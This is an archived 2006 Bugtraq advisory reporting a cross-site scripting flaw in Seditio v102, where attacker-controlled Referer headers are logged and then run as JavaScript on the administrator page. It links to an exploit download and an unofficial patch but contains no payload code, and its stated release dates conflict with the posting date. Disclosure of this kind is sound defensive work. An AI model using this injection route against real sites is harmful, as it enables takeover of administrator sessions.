lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060524151826.31459.qmail@securityfocus.com> Date: 24 May 2006 15:18:26 -0000 From: mail@...usemreyilmaz.com To: bugtraq@...urityfocus.com Subject: Seditio Cross Site Scripting Vulnerability Advisory : Cross Site Scripting in Seditio (http://www.neocrome.net) Release Date : 24/05/2005 Last Modified : 24/05/2005 Author : Yunus Emre Yilmaz ( http://yns.zaxaz.com) Application : Seditio v102 ( maybe older versions) Risk : Critical Problem : Ldu's logging all referer info for administrator.If an attacker change the referer value with malicious js codes, the code will be executed in administration page.Referer info is coming from user and can be changed as everything. Proof Of Concept : I wrote a simple exploit which can be downloaded from here : http://yns.zaxaz.com/exploits/seditio-exploit.rar Solution : I wrote an unofficial security patch which can be downloaded from here : http://yns.zaxaz.com/security-patches/security-patches-seditio-v102-xss-patch.rar (For offical patches : www.neocrome.net) Original Advisory : http://yns.zaxaz.com/advisories/seditio.txt